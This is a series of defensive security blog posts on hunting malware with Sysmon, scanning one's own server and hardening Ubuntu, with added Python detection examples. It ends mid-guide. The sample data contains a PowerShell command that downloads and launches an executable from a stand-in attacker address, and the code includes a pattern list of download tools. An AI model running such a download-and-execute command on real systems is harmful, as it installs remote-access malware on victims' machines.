Detecting a Cyber Attack Part 4 (Sysmon – Basic malware hunting 2)

In our first malware hunting blog we looked at an incident where a user had downloaded a malicious application from a website. Here we are going to investigate a malicious document received via email. This is our second basic investigation, but we will continue to ramp things up over the coming months.

Modern antivirus is very good at identifying and blocking known threats, but it can still be bypassed by unknown exploits (zero days) and by malicious MS Office document macros. Like any other software it can also fail to work correctly, which is why you need an effective logging solution that lets an investigation identify where malware has circumvented the protection in place.

This blog uses techniques we taught in our “Creating a Cyber Attack” series, so if you want to follow along and install a backdoor to hunt, you can use the same malicious exe and website from that exercise. The first blog in that series is linked here.

In our scenario an end user has been duped into opening a malicious document. We have received some unusual traffic alerts on the firewall from this asset, so we connect to take a look. Let’s jump in.

Although we don’t know it yet, the user received the document below

which, when opened, ran a malicious script that started a remote connection back to the attacker, giving them full access to the asset. This process is shown in the series of images below.

Once the victim has clicked yes in the document, the attacker sees the connection in their terminal.

The malicious process is running as PID 4048.

We obviously do not have this information yet, but luckily we have sysmon configured as covered in the previous blogs so let’s see what we can find.

We know the user works in Finance, we know when we first saw alerts on the firewall, and we know that the number one attack vector for end users is phishing email. Speak to the user: do they remember opening an attachment that crashed, receiving any unusual emails, or seeing pop-ups when browsing the internet? Any information the user can provide could be important.

We decide to start by looking for unusual activity relating to Office programs. We could of course just run netstat and look for unusual connections, but we are concentrating on Sysmon here.

We find a Word document being opened by WINWORD.EXE, but nothing odd yet.

This next log, however, looks suspicious: WINWORD.EXE (ParentImage) is starting cmd.exe (Image), and the parent command line is the Word document we saw earlier. Word has no legitimate reason to spawn a command shell, so this alone is worth chasing.

Now we have cmd.exe launching PowerShell, which runs an “Invoke-WebRequest” command line. Invoke-WebRequest is used to download files; here it writes one named “secure.exe”.

Next, PowerShell launches another PowerShell instance which tells the session to wait for 10 seconds.

Then we see PowerShell making an outbound connection to the same website mentioned in the logs above.

And finally we see confirmation of the malicious remote session connecting back to the attacker on port 4444, from process ID 4048.

If we refer back to Task Manager we can see that this matches the malicious exe.
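To turn the chain above into something you can re-run rather than eyeball, here is an added example (ours, not part of the original post or of the Sysmon tooling) that walks a handful of constructed Sysmon events with the same shape as the logs above: Event ID 1 Process Create records linked by ProcessGuid, and Event ID 3 Network Connect records. The GUIDs, PIDs, paths, document name and attacker address 192.0.2.10 are all made up. It flags an Office application spawning a shell, any command line carrying a download primitive, and any outbound connection whose process descends from an Office application, printing the full parent chain.

```python
"""Hunt the Office -> cmd -> PowerShell download -> callback chain in Sysmon events.

Added example, not the post's own tooling. EVENTS is constructed to mirror the
investigation in the post (field names follow Sysmon Event ID 1 Process Create and
Event ID 3 Network Connect); GUIDs, PIDs, paths, the document name and the attacker
address 192.0.2.10 are all made up. Parent/child links use ProcessGuid rather than
PID because Sysmon keeps GUIDs unique even when Windows reuses a PID.
"""
import re
from ntpath import basename

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line fragments that fetch content from the network; the post shows Invoke-WebRequest.
CRADLE_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|"
                       r"certutil.*-urlcache|bitsadmin.*/transfer", re.IGNORECASE)

WORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CRADLE = (r'powershell -nop -w hidden -c "Invoke-WebRequest http://192.0.2.10/secure.exe '
          r'-OutFile C:\Users\finance\secure.exe; Start-Process C:\Users\finance\secure.exe"')


def _create(guid, pid, image, cmdline, parent_guid, parent_image):
    return {"EventID": 1, "ProcessGuid": guid, "ProcessId": pid, "Image": image,
            "CommandLine": cmdline, "ParentProcessGuid": parent_guid, "ParentImage": parent_image}


def _connect(guid, pid, image, ip, port):
    return {"EventID": 3, "ProcessGuid": guid, "ProcessId": pid, "Image": image,
            "DestinationIp": ip, "DestinationPort": port}


EVENTS = [  # constructed sample data
    _create("{g0}", 1204, r"C:\Windows\explorer.exe", "explorer.exe", "{g-userinit}", r"C:\Windows\System32\userinit.exe"),
    _create("{g1}", 3120, WORD, f'"{WORD}" /n "C:\\Users\\finance\\Downloads\\invoice.doc"', "{g0}", r"C:\Windows\explorer.exe"),
    _create("{g2}", 3344, r"C:\Windows\System32\cmd.exe", "cmd /c " + CRADLE, "{g1}", WORD),
    _create("{g3}", 3560, PS, CRADLE, "{g2}", r"C:\Windows\System32\cmd.exe"),
    _create("{g4}", 4048, r"C:\Users\finance\secure.exe", r"C:\Users\finance\secure.exe", "{g3}", PS),
    _connect("{g4}", 4048, r"C:\Users\finance\secure.exe", "192.0.2.10", 4444),
    # benign noise: a browser started from the desktop talking to a web server
    _create("{g5}", 2210, r"C:\Program Files\Mozilla Firefox\firefox.exe", "firefox.exe", "{g0}", r"C:\Windows\explorer.exe"),
    _connect("{g5}", 2210, r"C:\Program Files\Mozilla Firefox\firefox.exe", "198.51.100.7", 443),
]


def _name(path):
    return basename(path).lower()


def office_spawning_shell(events):
    """Process creates where an Office app is the direct parent of a shell or script host."""
    return [e for e in events if e["EventID"] == 1
            and _name(e["ParentImage"]) in OFFICE_APPS and _name(e["Image"]) in SHELLS]


def download_cradles(events):
    """Process creates whose command line carries a known download primitive."""
    return [e for e in events if e["EventID"] == 1 and CRADLE_RE.search(e["CommandLine"])]


def ancestry(events, guid):
    """Image names from the given process up to the root, child first, via ParentProcessGuid."""
    creates = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    chain, seen = [], set()
    while guid in creates and guid not in seen:   # `seen` guards against a malformed cycle
        seen.add(guid)
        chain.append(_name(creates[guid]["Image"]))
        guid = creates[guid]["ParentProcessGuid"]
    return chain


def hunt(events):
    """Network connections made by any descendant of an Office application."""
    findings = []
    for e in events:
        if e["EventID"] == 3:
            chain = ancestry(events, e["ProcessGuid"])
            if OFFICE_APPS & set(chain):
                findings.append({"pid": e["ProcessId"], "chain": " -> ".join(reversed(chain)),
                                 "dest": f'{e["DestinationIp"]}:{e["DestinationPort"]}'})
    return findings


if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f"PID {f['pid']}: {f['chain']} -> {f['dest']}")
```

Run as-is it reports the secure.exe connection with its explorer → WINWORD → cmd → powershell ancestry and ignores the Firefox connection. On a real host, export the Sysmon/Operational log (wevtutil can write it as XML) and map the EventData fields to the same keys before feeding it in.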

Again this is a basic technique, but it will help you to understand the types of things you should be looking for. In future blogs we will go on to look at obfuscated commands and how we decode them to get the information we need.

Detecting a Cyber Attack Part 3 (Sysmon – Basic malware hunting)

In the first two blogs of this series we installed and configured a basic Sysmon set-up with a verbose custom view. Now we are going to show how even this simple set-up can help with threat hunting and incident response. This is a very basic investigation to start with, but we will continue to ramp things up over the coming months.

Modern antivirus is very good at identifying and blocking known threats, but it can still be bypassed by unknown exploits (zero days) and by malicious MS Office document macros. Like any other software it can also fail to work correctly, which is why you need an effective logging solution that lets an investigation identify where malware has circumvented the protection in place.

This blog uses techniques we taught in our “Creating a Cyber Attack” series, so if you want to follow along and install a backdoor to hunt, you can use the same malicious exe and website from that exercise. The first blog in that series is linked here.

In our scenario an end user has been duped into visiting a malicious website and downloading an application. They contact the service desk to report that they think they have made a mistake, and we are going to try to identify whether there is any malicious activity on their asset. Let’s jump in.

Our user has visited the following site

And run the following application from the site

The download claims to be an update for flash player

We connect to the asset, open Event Viewer and select the custom view we created earlier. We know roughly when they visited the website, and we quickly find a file create event at the same time for the file “flash_update.exe”.

The next log entry shows the process create event for “flash_update.exe”, which was downloaded from the site the user visited.

We now have the .exe name and the website address. The same log also shows the process ID (2508) and the parent process ID (3584). Let’s use Task Manager to see if we can gather a bit more info, and see if they are still running.

Once Task Manager has opened select to show processes from all users.

Then select “view”

and ensure PID is ticked so the process identifier column is displayed

Now we can see the PID, click the column header to sort numerically making them easier to find.

We can see the parent process 3584, but no sign of 2508 even though we can see “flash_update.exe” is still running but under a different PID.

Let’s right click the “flash_update.exe” process and look at the properties.

We can see that although the exe is named flash_update, the description is completely different, and the product name suggests it is something to do with an HTTP server.

If we compare this to a genuine Adobe file already installed on the same asset it’s clear something is not right.

The genuine file also has a digital signature.

Let’s go back into the Sysmon logs and look for more info. Below we can see in the timeline that after the file create and process create we have a network connection detected for the same “flash_update.exe”. Sysmon gives us a bucket load of information for this, including;

  • The process ID
  • Source and destination hostname
  • Source and destination IP addresses
  • Source and destination port numbers

Let’s open a cmd prompt and use netstat to look for the connection.

We are going to use the flags “-a”, “-n” and “-o” with the command below.

  • -a – Displays all active TCP connections and the TCP and UDP ports on which the computer is listening
  • -n – Displays active TCP connections, however, addresses and port numbers are expressed numerically and no attempt is made to determine names.
  • -o – Displays active TCP connections and includes the process ID (PID) for each connection. You can find the application based on the PID on the Processes tab in Windows Task Manager.

You can use netstat to show just TCP ports, or just a specified port, but for demo purposes we are using “-ano”. There’s a good netstat tutorial here.

We have highlighted the column headers this command provides and also highlighted the malicious process we have identified as running on this asset.

Sysmon has provided most of the information we need to be able to either monitor the machine for further information or terminate the malicious process.
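The joins above were done by eye between Event Viewer, Task Manager and netstat. The added example below (ours, not the post’s code) does the same join programmatically and shows why the PID from the Process Create event is not enough on its own: it parses constructed netstat -ano output, matches each established session to a Sysmon Network Connect event by PID and destination, and then reaches the Process Create record through ProcessGuid, which survives the PID change observed above. Everything in it is made up: PIDs, GUIDs, paths, the victim address 10.0.0.5 and the attacker address 192.0.2.10.

```python
"""Join netstat -ano output to the Sysmon events that explain each connection.

Added example, not from the post. Sysmon records the PID at process-create time; if
the binary re-launches itself the PID you see later differs (the post sees exactly
that), so the join goes through ProcessGuid, which Sysmon keeps unique across PID
reuse. All PIDs, GUIDs, paths, the victim address 10.0.0.5 and the attacker address
192.0.2.10 are constructed.
"""
import re
from ntpath import basename

# One line of `netstat -ano`: proto, local, foreign, optional state (UDP has none), PID.
NETSTAT_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:([A-Z_]+)\s+)?(\d+)\s*$")

NETSTAT_OUTPUT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       712
  TCP    10.0.0.5:49722         192.0.2.10:4444        ESTABLISHED     3112
  TCP    10.0.0.5:49730         198.51.100.7:443       ESTABLISHED     2210
  UDP    0.0.0.0:5355           *:*                                    1032
"""

FLASH = r"C:\Users\finance\Downloads\flash_update.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"
SYSMON_EVENTS = [  # constructed sample data
    # Event ID 11: the browser writes the download to disk.
    {"EventID": 11, "ProcessGuid": "{ff-1}", "ProcessId": 2210, "Image": FIREFOX, "TargetFilename": FLASH},
    {"EventID": 1, "ProcessGuid": "{ff-1}", "ProcessId": 2210, "ParentProcessId": 1204,
     "Image": FIREFOX, "Description": "Firefox"},
    # Event ID 1: first launch of the download (PID 2508, parent 3584 = explorer.exe here).
    {"EventID": 1, "ProcessGuid": "{fu-1}", "ProcessId": 2508, "ParentProcessId": 3584,
     "Image": FLASH, "Description": "HTTP server utility (constructed; nothing like Adobe's)"},
    # The payload starts a second copy of itself and the first exits, so 2508 is gone.
    {"EventID": 1, "ProcessGuid": "{fu-2}", "ProcessId": 3112, "ParentProcessId": 2508,
     "Image": FLASH, "Description": "HTTP server utility (constructed; nothing like Adobe's)"},
    # Event ID 3: the surviving copy calls back to the attacker; Firefox does normal browsing.
    {"EventID": 3, "ProcessGuid": "{fu-2}", "ProcessId": 3112, "Image": FLASH,
     "DestinationIp": "192.0.2.10", "DestinationPort": 4444},
    {"EventID": 3, "ProcessGuid": "{ff-1}", "ProcessId": 2210, "Image": FIREFOX,
     "DestinationIp": "198.51.100.7", "DestinationPort": 443},
]


def parse_netstat(text):
    """Parse `netstat -ano` text into rows; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if not m:
            continue
        proto, local, foreign, state, pid = m.groups()
        host, port = foreign.rsplit(":", 1)
        rows.append({"proto": proto, "local": local, "foreign_ip": host,
                     "foreign_port": int(port) if port.isdigit() else None,
                     "state": state, "pid": int(pid)})
    return rows


def established_external(rows, local_prefixes=("10.", "192.168.", "172.16.", "127.")):
    """TCP sessions to addresses outside the ranges we treat as internal (deliberately crude)."""
    return [r for r in rows if r["proto"] == "TCP" and r["state"] == "ESTABLISHED"
            and not r["foreign_ip"].startswith(local_prefixes)]


def creates_for_image(events, exe_name):
    """Every Process Create (Event ID 1) for a given binary name, oldest first."""
    return [e for e in events if e["EventID"] == 1
            and basename(e["Image"]).lower() == exe_name.lower()]


def attribute(rows, events):
    """Match each netstat row to a Sysmon Network Connect (same PID and destination), then
    reach the Process Create behind it via ProcessGuid rather than PID."""
    creates = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    connects = [e for e in events if e["EventID"] == 3]
    hits = []
    for r in rows:
        for n in connects:
            if (n["ProcessId"], n["DestinationIp"], n["DestinationPort"]) == (r["pid"], r["foreign_ip"], r["foreign_port"]):
                c = creates.get(n["ProcessGuid"], {})
                hits.append({"pid": r["pid"], "dest": f"{r['foreign_ip']}:{r['foreign_port']}",
                             "guid": n["ProcessGuid"], "image": c.get("Image"),
                             "parent_pid": c.get("ParentProcessId"), "description": c.get("Description")})
    return hits


if __name__ == "__main__":
    rows = parse_netstat(NETSTAT_OUTPUT)
    for h in attribute(established_external(rows), SYSMON_EVENTS):
        print(f"PID {h['pid']} -> {h['dest']}: {h['image']} (parent PID {h['parent_pid']}, {h['description']})")
    live = {r["pid"] for r in rows}
    for c in creates_for_image(SYSMON_EVENTS, "flash_update.exe"):
        print(f"process create PID {c['ProcessId']} guid {c['ProcessGuid']} still running: {c['ProcessId'] in live}")
```

The second loop is the point: the first Process Create for flash_update.exe (PID 2508) is no longer in netstat, but the GUID on the Network Connect event still leads straight to the Process Create that explains the live session, including its parent PID and the suspicious description the post noticed in the file properties.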

Here we have the attacker’s view of the connection

Here we have shown how to run a basic investigation using only Sysmon and Task Manager. There are lots of other tools at our disposal and we will cover some of these in the future.

Detecting a Cyber Attack Part 2 (Sysmon – Create a verbose custom view)

As covered in the previous blog, Sysmon is very powerful for logging and alerting, however the logs are buried deep in the folder structure of Event Viewer, so ideally we want quick access to them when threat hunting locally on an asset. (We will cover centralising logs later in the series, or have a read of our previous blog series on building a free SIEM solution; the Sysmon part is here if you want to take a look.)

However, back to today’s blog. We don’t want to go searching for Sysmon logs, and sometimes we want a different level of logging, either verbose or brief depending on how much information you wish to see, which is where custom views come in handy. In this demo we will create a verbose view which shows everything; in other demos we will create custom views for very specific logs and events. As we are starting from scratch here, we want to see everything.

You’ll find Sysmon logs under Event Viewer > Applications and Services Logs > Microsoft > Windows > Sysmon > Operational, so let’s open up Event Viewer and create our custom view. (Although we are using Windows 7 here in our lab, the steps are exactly the same in Windows 10.)

Type eventvwr in the search bar

Below we see the native location of the sysmon logs

Select create custom view on the right hand side of Event Viewer and complete the steps as shown. Remember we are creating a verbose log so it will create a lot of information.

  • Tick all the boxes
  • Select Sysmon from the dropdown
  • Select All Task Categories
  • Select all keywords
  • The completed form should look like this
  • Create a name and add a description (If you do not add a description it will not work)

We can see our custom view at the top left of Event Viewer.

That’s it! Simple right? In the next blog we will use this view to do some basic malware hunting.

Detecting a Cyber Attack Part 1 (Sysmon – endpoint install)

Now that we have finished our “Creating a Cyber Attack” series (Part 1 is linked here), where we showed how a cyber attack is put together, we are going to move on to detection.

Sysmon has been around for a while now, but recently it has really been gaining traction as a must-have for organisations. Sysmon provides enhanced logging of selected system events so that analysts can more easily identify malicious activity, and it can be configured to include or exclude events depending on the environment.

Sysmon’s capabilities include;

  • Logs process creation with full command line for both current and parent processes.
  • Records the hash of process image files using SHA1 (the default), MD5, SHA256 or IMPHASH.
  • Includes a process GUID in process create events to allow for correlation of events even when Windows reuses process IDs.
  • Includes a session GUID in each event to allow correlation of events on same logon session.
  • Logs loading of drivers or DLLs with their signatures and hashes.
  • Logs opens for raw read access of disks and volumes.
  • Optionally logs network connections, including each connection’s source process, IP addresses, port numbers, hostnames and port names.
  • Detects changes in file creation time to understand when a file was really created. Modification of file create timestamps is a technique commonly used by malware to cover its tracks.
  • Generates events from early in the boot process to capture activity made by even sophisticated kernel-mode malware.

For full capability information visit the link below

For the configuration file we will be using the @swiftonsecurity template from github at the below URL

This is a great template to start off with, and as every line of the xml file is commented it’s also a great place to learn. In our demo we need to remove the DNS query section, as that event type is not supported on Windows 7.

Right let’s get cracking and get Sysmon installed.

Download the official version of Sysmon from Microsoft Sysinternals; you’ll need to unzip it and save it to a convenient location.

Then download the config file from here

Now we need to edit the config file; I just did this in good old Notepad.

Find the DNS query section, then highlight from the <RuleGroup name="" groupRelation="or"> line that opens it down to its matching </RuleGroup> and delete the whole section.

Save your changes, then copy the file so it is in the same folder as your sysmon download.
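If you would rather not hand-edit the template (or need to repeat the step on several hosts), here is an added example, not part of the post or of the SwiftOnSecurity project, that removes the DnsQuery rule group from a Sysmon config with Python’s standard XML parser. SAMPLE_CONFIG is a constructed miniature in the shape of the template; a real template is far longer but nests the same way.

```python
"""Remove event types a Sysmon config can't use on this host before installing it.

Added example, not part of the post. SAMPLE_CONFIG is a constructed miniature in the
shape of the SwiftOnSecurity template (Sysmon > EventFiltering > RuleGroup > one
event type per group); the real file is much longer but nests the same way. Rules are
matched by tag name, so the DnsQuery group goes wherever it sits in the file, and a
group left with nothing but comments is dropped with it. Comments inside the root
element are kept (the template is heavily commented); anything before <Sysmon> is
not part of the tree fromstring returns, so keep the file header separately if you
care about it.
"""
import xml.etree.ElementTree as ET

SAMPLE_CONFIG = r"""<Sysmon schemaversion="4.1">
  <HashAlgorithms>md5,sha256,IMPHASH</HashAlgorithms>
  <EventFiltering>
    <!-- keep: process creates are the core of both investigations -->
    <RuleGroup name="" groupRelation="or">
      <ProcessCreate onmatch="exclude">
        <Image condition="is">C:\Windows\System32\conhost.exe</Image>
      </ProcessCreate>
    </RuleGroup>
    <RuleGroup name="" groupRelation="or">
      <DnsQuery onmatch="exclude">
        <QueryName condition="end with">.microsoft.com</QueryName>
      </DnsQuery>
    </RuleGroup>
    <RuleGroup name="" groupRelation="or">
      <NetworkConnect onmatch="include">
        <DestinationPort condition="is">4444</DestinationPort>
      </NetworkConnect>
    </RuleGroup>
  </EventFiltering>
</Sysmon>
"""

# Event types that need a newer OS than Windows 7; DnsQuery (Event ID 22) is the one
# the post removes by hand.
UNSUPPORTED = {"DnsQuery"}


def _parse(config_xml):
    # insert_comments=True keeps <!-- --> nodes so the template's annotations survive.
    parser = ET.XMLParser(target=ET.TreeBuilder(insert_comments=True))
    return ET.fromstring(config_xml, parser=parser)


def event_types(config_xml):
    """Sorted list of the event-type tags present in the config."""
    root = _parse(config_xml)
    return sorted({rule.tag for g in root.iter("RuleGroup") for rule in g if isinstance(rule.tag, str)})


def strip_unsupported(config_xml, unsupported=UNSUPPORTED):
    """Return (new_xml, removed_tags) with every rule block of an unsupported type deleted."""
    root = _parse(config_xml)
    filtering = root.find("EventFiltering")
    removed = []
    for group in list(filtering.findall("RuleGroup")):
        for rule in list(group):
            if rule.tag in unsupported:
                group.remove(rule)
                removed.append(rule.tag)
        if not any(isinstance(child.tag, str) for child in group):  # nothing but comments left
            filtering.remove(group)
    return ET.tostring(root, encoding="unicode"), removed


if __name__ == "__main__":
    new_xml, gone = strip_unsupported(SAMPLE_CONFIG)
    print("removed:", gone)
    print(new_xml)
```

Point it at the real template by reading the file into strip_unsupported and writing the returned string back out, then run the same sysmon.exe -i command on the result; on a Windows 8.1 or later host you would simply leave UNSUPPORTED empty.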

To install Sysmon you need to run it from an admin cmd prompt, which you can do by right clicking and selecting “run as administrator”.

Once your cmd is open you need to copy the location of your Sysmon files so you can run the command from inside the folder.

type “cd” then paste in your location

Now we just run the cmd as shown below

sysmon.exe -accepteula -i sysmonconfig-export.xml

That’s it! If you receive no errors then Sysmon should be running. Let’s go look at some logs in Event Viewer.

Sysmon logs are stored under

Application and Services Logs/Microsoft/Windows/Sysmon/Operational

The below image shows Sysmon logging us opening Event Viewer

If we now open Firefox we get lots of logs showing what it is doing: the processes it runs, where it updates from, the DLLs it loads, and lots of other info which would be invaluable if we were hunting malware.

Hope you enjoyed this quick look at Sysmon; we will be covering it in more detail as we progress.

How to check your own server and website. (QGR)

If you have been following the previous QGRs and the past few posts, we have shown how to install LEMP on Ubuntu and carry out some basic hardening of the OS.

We can verify this internally by checking versions on the server but how do we get the external view and see what an attacker would see? Again, this does not need to be extremely expensive. Let’s dive in and look at some great, freely available tools.

Below is a list of free resources we are going to use in this guide.

Nmap free network scanner download

Immuniweb free website scanner

Free web security headers report

Free WordPress website scanner

OK, now you have all the links, let’s get started.


nmap is a free network scanner and we can use this to verify that our firewall is set correctly, and the exposed applications are running the latest versions. Let’s fire it up and scan our site.


This performs a basic scan of our webserver’s top 1000 ports (we will cover more advanced scanning in a later post). The results are shown below.

This shows that as expected our server has only 3 ports exposed to the internet. Now let’s do a version check on those services by adding the “-sV” flag.

nmap -sV

We can now see the versions, a quick google shows we are on the latest versions, so we can move on.

If you want to scan all ports then add the “-p” flag, and port range as below

nmap -p 0-65535

immuniweb scan

Right, let’s go to ImmuniWeb’s site and use the free web scanner to scan our site by selecting “Community Edition” and “Website Security Test”.

After around 10 minutes you will get a report as shown below

This report will provide remediation advice if any issues are found, so have a good read through. We will come back to these reports in later posts to show best practice configuration and other tips.

Security Headers

Security headers are important for website security, not only for your site, but also for anyone who visits your site. Browse to the Security Headers website and start a scan. As before after a short while you will receive a report for your site as shown below.

This also has some great resources for helping you to understand what each finding means and how to remediate any issues. As with the other tests, we will come back to these in the next post.
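You can also check the headers yourself before (or instead of) a remote scan. The added example below, ours rather than the post’s or the Security Headers service’s, parses the head of an HTTP response such as curl -sI prints and checks it against a small baseline; the two sample responses are constructed.

```python
"""Check HTTP response headers against a simple baseline.

Added example, not from the post or the Security Headers service. The two responses
below are constructed; paste the output of `curl -sI https://your-site/` into
parse_raw_headers() to check a real one (header names are case-insensitive, so the
checker lower-cases them).
"""
import re

LONG_MAX_AGE = 31536000  # one year, the value most HSTS guidance recommends


def _hsts_ok(value):
    m = re.search(r"max-age=(\d+)", value, re.IGNORECASE)
    return bool(m) and int(m.group(1)) >= LONG_MAX_AGE


# header -> predicate saying whether its value is acceptable
BASELINE = {
    "strict-transport-security": _hsts_ok,
    "content-security-policy": lambda v: v.strip() != "",
    "x-content-type-options": lambda v: v.strip().lower() == "nosniff",
    "x-frame-options": lambda v: v.strip().upper() in {"DENY", "SAMEORIGIN"},
    "referrer-policy": lambda v: v.strip() != "",
    "permissions-policy": lambda v: v.strip() != "",
}
# headers that hand an attacker a version to look up
DISCLOSING = ("server", "x-powered-by")


def parse_raw_headers(raw):
    """Turn the text of an HTTP response head (status line plus headers) into a lower-cased dict."""
    headers = {}
    for line in raw.splitlines()[1:]:          # skip the status line
        if ":" not in line:
            continue                           # blank line or stray text
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def check_headers(headers):
    """Return a list of findings; an empty list means the baseline is met."""
    findings = []
    for name, ok in BASELINE.items():
        if name not in headers:
            findings.append(f"missing: {name}")
        elif not ok(headers[name]):
            findings.append(f"weak: {name}: {headers[name]}")
    for name in DISCLOSING:
        value = headers.get(name, "")
        if re.search(r"\d+\.\d+", value):      # a version number, e.g. nginx/1.14.0
            findings.append(f"discloses version: {name}: {value}")
    return findings


WEAK_RESPONSE = """HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/7.2.24
X-Frame-Options: ALLOWALL
"""

HARDENED_RESPONSE = """HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src 'self'
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Permissions-Policy: camera=(), microphone=(), geolocation=()
"""

if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, check_headers(parse_raw_headers(raw)) or "baseline met")
```

The baseline is deliberately small and strict: a Content-Security-Policy that merely exists is counted as present, so review the policy itself, and treat the version-disclosure finding as a prompt to set server_tokens off in nginx and expose_php = Off in php.ini rather than as a vulnerability in its own right.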

WordPress Security

If you are using WordPress, and making use of themes and plugins it is vital you ensure you are keeping everything up to date. That means the version of WordPress itself, the current live theme, and all plugins you have installed.

Luckily there are free tools for this as well, so let’s head over to the wpsec website and launch the scan.

Simply pop in your website URL , tick the box and off we go.

If there are any issues it will tell you on this page,and you can sign up for a free account to receive a more in-depth report.

Ubuntu Hardening Guide – Basic (QGR)

In the past few weeks we have gone through setting up a LEMP stack on Ubuntu to run our WordPress site.

As this is a web server that will be exposed to the internet we need to do some additional configuration regardless of whether it sits behind a Next-Gen Firewall or Web App Firewall. Perimeter security is no longer sufficient; we need to harden the operating system to provide some defence in depth.

Now you shouldn’t look at this as an all or nothing situation, or that hardening the operating system is something you do once and that’s it. You can start with the basics which greatly reduces your exposure, but it needs to be monitored and maintained over time.

I start with the basics and then dependent on the resources available and the value of the server/data I make improvements over time, this is a great way to learn.

Below are some resources for further information on hardening Ubuntu.

Ubuntu Hardening Wiki

NCSC Hardening Guide

UFW guide

As this is a quick guide we won’t be going into too much detail for each setting, but as always I encourage you to look into this yourself so you understand what we are doing.

In-depth SSH keys guide

Bitvise download

The steps we will take are;

  • Enable ufw. This is the built-in host-based firewall.
  • Install fail2ban. This watches log files for repeated failures such as SSH brute-force attempts and bans the offending IP addresses at the firewall.
  • Secure shared memory. A world-writable, executable shared memory area can be used to stage and run code against running services, so we mount it noexec and nosuid.
  • Create a non-root user, and grant sudo privileges.
  • Enable key pair SSH login.
  • Disable SSH password authentication and root ssh login.
  • Disable X11 forwarding (tunnelling graphical applications over SSH).
  • Disconnect idle sessions.
  • Allow/Deny users

Make a backup

Make a backup, now we can continue.

Enable ufw

This configuration is based on the assumption we are using port 22 for SSH, and have ports 80 and 443 open for web services.

ufw is installed by default so there is nothing to install. Add the allow rules first and only then enable it: if you enable it over SSH before allowing port 22, the default deny policy will stop you reconnecting.

sudo ufw allow 22/tcp
sudo ufw allow 80/tcp
sudo ufw allow 443/tcp

Now enable it

sudo ufw enable

You can check status using the below

sudo ufw status


Install fail2ban

First up, let’s install.

sudo apt-get install fail2ban

fail2ban will work right out of the box, but we can make some small adjustments. Rather than make changes directly to the default config file located at “/etc/fail2ban/jail.conf” we can create a new file named jail.local using the following command.

sudo nano /etc/fail2ban/jail.local

Then add the following to the new file. The [sshd] line is the section header that ties the settings to the sshd jail; without it fail2ban has nothing to apply them to.

[sshd]
enabled = true
port = 22
filter = sshd
logpath = /var/log/auth.log
maxretry = 5

This monitors for brute force login attempts on port 22. Now just save and close the file, then restart fail2ban.

sudo systemctl restart fail2ban

Remember that this will also block YOUR IP if you fail 5 login attempts. You can adjust the ban length and the window in which retries are counted (bantime and findtime) in the same jail.local file; leave jail.conf alone so a package upgrade does not overwrite your changes.

Protect shared memory space

We need to edit the /etc/fstab file and make a settings change.

sudo nano /etc/fstab

Now we add the following line to the bottom of the file, before saving and closing. (On recent Ubuntu releases /run/shm is a symlink to /dev/shm; check which one is the real directory on your system and use that as the mount point.)

tmpfs /run/shm tmpfs defaults,noexec,nosuid 0 0

This will require a restart which is a simple command.

sudo reboot

Create non-root user with sudo privileges

Logging into your Linux box as root and using it as your everyday account is the same as just using the domain admin or local administrator account as a normal user account. If you don’t understand how bad this is you should go find out!

We will create a standard user account but grant it sudo privileges so you do not have to log out each time you need root. You will be able to use the ‘sudo’ command and enter your password to elevate to the needed permission level. Let’s get started.

Log in as root and run the following commands picking your own username

adduser newuser

Choose a strong password; answering the other questions is optional. Next we assign sudo to the new user.

usermod -aG sudo newuser

That’s it. If you want to change user just use (replace newuser with the desired username)

su newuser

Enable key pair ssh login.

This is much more secure than password authentication, and again, if you do not understand why, I really encourage you to go and find out. As most of you will be connecting to your server from a Windows machine I’ll cover setting this up using an SSH GUI client; if you are connecting from a Linux box, follow the link in the resources section for a quick way to perform this process from the command line.

I’m a fan of Bitvise ssh (link in resource section above) and from here we can easily create our key pair from the login tab and selecting “Client key manager”.

Generate new as shown

Make note of the profile number, and choose a strong passphrase. You can choose a larger key size if you wish but do not go lower.

Now below we can see our new key, and the export button to create a file of our public key.

Export as shown below and remember where you have saved it.

Now login to your Ubuntu machine using your new account and check for the ssh directory, and if we don’t have one we need to create it. The following command will create the directory if it does not exist and do nothing if it does.

mkdir -p ~/.ssh

Now browse here using cd and locate the “authorized_keys” file.

cd ~/.ssh

If the “authorized_keys” file is not there then create it (no sudo needed, this is your own home directory; using sudo here would leave the file owned by root)

nano authorized_keys

Now go back to your exported file on your local machine and paste the contents into the new file on your Ubuntu machine. The line should start with “ssh-rsa” (or “ssh-ed25519” if you generated an Ed25519 key). Then save and close the file.

Now we set permissions making sure you replace “newuser” with your own username

chmod -R go= ~/.ssh
chown -R newuser:newuser ~/.ssh

Now we need to test that this works, so disconnect from the remote session and attempt to login using public key authentication instead of a password. In Bitvise select the correct profile, and pubkey as shown. Obviously you will need the username and host address to connect.

The first time you connect you will receive a warning about host key verification; as long as you are sure you are connecting to the correct host you can accept it on this first connection. Should you ever see this warning again when connecting to this machine, verify the host key before continuing, to make sure you are not the victim of a man-in-the-middle.

You will then be prompted for the key pair passphrase (not your login password), enter this and you should be logged in. Well done now we need to disable password authentication, and root ssh login.

Disable password authentication and root ssh login

